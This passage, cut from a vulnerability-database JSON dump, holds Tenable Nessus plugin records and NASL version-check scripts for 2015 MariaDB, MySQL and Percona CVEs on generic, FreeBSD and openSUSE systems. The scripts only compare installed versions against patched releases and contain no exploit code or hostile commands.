an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4815)\n\n - An unspecified flaw exists related to the Types\n subcomponent that allows an authenticated, remote\n attacker to gain access to sensitive information.\n (CVE-2015-4826)\n\n - An unspecified flaw exists related to the\n Security:Privileges subcomponent that allows an\n authenticated, remote attacker to affect the integrity\n of the system. No other details are available.\n (CVE-2015-4830)\n\n - An unspecified flaw exists related to the SP\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4836)\n\n - Multiple unspecified flaws exist related to the DML\n subcomponent that allow an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4858,\n CVE-2015-4913)\n\n - An unspecified flaw exists related to the InnoDB\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4861)\n\n - An unspecified flaw exists related to the Parser\n subcomponent that allows an authenticated, remote\n attacker to cause a denial of service. (CVE-2015-4870)\n\n - A flaw exists in the mysql_prepare_create_table()\n function due to improper handling of a comma buffer that\n is greater than zero. An authenticated, remote attacker\n can exploit this to cause a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.org/mariadb-5-5-46-now-available/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.com/kb/en/mariadb/mariadb-5546-changelog/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-7050\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 5.5.46 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4830\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'5.5.46-MariaDB', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-01T03:45:41", "description": "The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.22. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the 'Server : Partition'\n subcomponent. An authenticated, remote attacker can\n exploit these flaws to affect availability.\n (CVE-2015-4792, CVE-2015-4802)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the Query Cache subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4807)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the DDL subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4815)\n\n - An information disclosure vulnerability exists due to an\n unspecified flaw in the Types subcomponent. An\n authenticated, remote attacker can exploit this to gain\n access to sensitive information. (CVE-2015-4826)\n\n - An unspecified vulnerability exists due to an\n unspecified flaw in the 'Security : Privileges'\n subcomponent. An authenticated, remote attacker can\n exploit this to affect integrity. (CVE-2015-4830)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the SP subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4836)\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the DML subcomponent. An\n authenticated, remote attacker can exploit these flaws\n to affect availability. (CVE-2015-4858, CVE-2015-4913)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the InnoDB subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4861)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the 'Server : Parser' subcomponent.\n An authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4870)\n\n - A denial of service vulnerability exists due to a flaw\n in the ha_partition::index_init() function that is\n triggered when handling the priority queue. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_field::fix_outer_field() function that is\n triggered when handling PREPARE statements. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the convert_kill_to_deadlock_error() function that is\n triggered when handling rollbacks. An authenticated, \n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the no_rows_in_result() function that is triggered\n when handling logical conditions. An authenticated,\n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the handle_grant_struct() function that is triggered\n when handling HASH updates. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the is_invalid_role_name() function that is triggered\n when handling ACLs with blank role names. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_direct_view_ref class that is triggered\n when handling SELECT queries. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the opt_sum_query() function that is triggered when\n handling constant tables. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.", "edition": 29, "published": "2015-11-13T00:00:00", "title": "MariaDB 10.0.x < 10.0.22 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mariadb:mariadb"], "id": "MARIADB_10_0_22.NASL", "href": "https://www.tenable.com/plugins/nessus/86874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86874);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n \"CVE-2015-4807\",\n \"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\"\n );\n\n script_name(english:\"MariaDB 10.0.x < 10.0.22 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the MariaDB version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote database server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of MariaDB running on the remote host is 10.0.x prior to\n10.0.22. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the 'Server : Partition'\n subcomponent. An authenticated, remote attacker can\n exploit these flaws to affect availability.\n (CVE-2015-4792, CVE-2015-4802)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the Query Cache subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4807)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the DDL subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4815)\n\n - An information disclosure vulnerability exists due to an\n unspecified flaw in the Types subcomponent. An\n authenticated, remote attacker can exploit this to gain\n access to sensitive information. (CVE-2015-4826)\n\n - An unspecified vulnerability exists due to an\n unspecified flaw in the 'Security : Privileges'\n subcomponent. An authenticated, remote attacker can\n exploit this to affect integrity. (CVE-2015-4830)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the SP subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4836)\n\n - Multiple denial of service vulnerabilities exist due to\n multiple unspecified flaws in the DML subcomponent. An\n authenticated, remote attacker can exploit these flaws\n to affect availability. (CVE-2015-4858, CVE-2015-4913)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the InnoDB subcomponent. An\n authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4861)\n\n - A denial of service vulnerability exists due to an\n unspecified flaw in the 'Server : Parser' subcomponent.\n An authenticated, remote attacker can exploit this to\n affect availability. (CVE-2015-4870)\n\n - A denial of service vulnerability exists due to a flaw\n in the ha_partition::index_init() function that is\n triggered when handling the priority queue. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_field::fix_outer_field() function that is\n triggered when handling PREPARE statements. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the convert_kill_to_deadlock_error() function that is\n triggered when handling rollbacks. An authenticated, \n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the no_rows_in_result() function that is triggered\n when handling logical conditions. An authenticated,\n remote attacker can exploit this, via a specially\n crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the handle_grant_struct() function that is triggered\n when handling HASH updates. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the is_invalid_role_name() function that is triggered\n when handling ACLs with blank role names. An\n authenticated, remote attacker can exploit this, via a\n specially crafted query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the Item_direct_view_ref class that is triggered\n when handling SELECT queries. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\n\n - A denial of service vulnerability exists due to a flaw\n in the opt_sum_query() function that is triggered when\n handling constant tables. An authenticated, remote\n attacker can exploit this, via a specially crafted\n query, to cause the database to crash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.org/mariadb-10-0-22-now-available/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8805\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8756\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8725\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8624\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8614\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-8525\");\n script_set_attribute(attribute:\"see_also\", value:\"https://mariadb.atlassian.net/browse/MDEV-7930\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MariaDB version 10.0.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4830\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/13\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mariadb:mariadb\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_version.nasl\", \"mysql_login.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/mysql\", 3306);\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nmysql_check_version(variant:'MariaDB', fixed:'10.0.22-MariaDB', min:'10.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-01-07T10:46:46", "description": "Oracle reports :\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior,\n5.6.26 and prior", "edition": 22, "published": "2015-11-12T00:00:00", "title": "FreeBSD : MySQL - Multiple vulnerabilities (851a0eea-88aa-11e5-90e7-b499baebfeaf)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-11-12T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:mysql56-server", "p-cpe:/a:freebsd:freebsd:mariadb100-server", "p-cpe:/a:freebsd:freebsd:mariadb100-client", "p-cpe:/a:freebsd:freebsd:mariadb55-client", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mysql56-client", "p-cpe:/a:freebsd:freebsd:mysql55-client", "p-cpe:/a:freebsd:freebsd:mariadb-server", "p-cpe:/a:freebsd:freebsd:percona55-server", "p-cpe:/a:freebsd:freebsd:mysql55-server", "p-cpe:/a:freebsd:freebsd:percona55-client", "p-cpe:/a:freebsd:freebsd:percona56-client", "p-cpe:/a:freebsd:freebsd:mariadb-client", "p-cpe:/a:freebsd:freebsd:percona56-server", "p-cpe:/a:freebsd:freebsd:mariadb55-server"], "id": "FREEBSD_PKG_851A0EEA88AA11E590E7B499BAEBFEAF.NASL", "href": "https://www.tenable.com/plugins/nessus/86858", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86858);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"FreeBSD : MySQL - Multiple vulnerabilities (851a0eea-88aa-11e5-90e7-b499baebfeaf)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Oracle reports :\n\nCritical Patch Update: MySQL Server, version(s) 5.5.45 and prior,\n5.6.26 and prior\"\n );\n # http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75a4a4fb\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-5546-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-5546-release-notes/\"\n );\n # https://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n # https://www.percona.com/doc/percona-server/5.5/release-notes/Percona-Server-5.5.46-37.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e29b246f\"\n );\n # https://www.percona.com/doc/percona-server/5.6/release-notes/Percona-Server-5.6.27-75.0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ac422d9\"\n );\n # https://vuxml.freebsd.org/freebsd/851a0eea-88aa-11e5-90e7-b499baebfeaf.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ffa5ea9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb100-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mariadb55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mysql56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona55-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:percona56-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"mariadb-client<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb-server<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-client<10.0.22\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mariadb100-server<10.0.22\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-client<5.6.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mysql56-server<5.6.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-client<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona55-server<5.5.46\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-client<5.6.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"percona56-server<5.6.27\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:28:56", "description": "MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792\n\nA list of upstream changes and release notes can be found here :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThe following build problems were fixed :\n\n - bsc#937787: fix main.bootstrap test (change default\n charset to utf8 in test result)", "edition": 18, "published": "2015-12-17T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2015-884)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-12-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2015-884.NASL", "href": "https://www.tenable.com/plugins/nessus/87440", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-884.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87440);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2015-884)\");\n script_summary(english:\"Check for the openSUSE-2015-884 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB was updated to 10.0.22 to fix security issues and bugs.\n\nThe following vulnerabilities were fixed in the upstream release :\n\nCVE-2015-4802, CVE-2015-4807, CVE-2015-4815, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861,\nCVE-2015-4870, CVE-2015-4913, CVE-2015-4792\n\nA list of upstream changes and release notes can be found here :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThe following build problems were fixed :\n\n - bsc#937787: fix main.bootstrap test (change default\n charset to utf8 in test result)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937787\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n 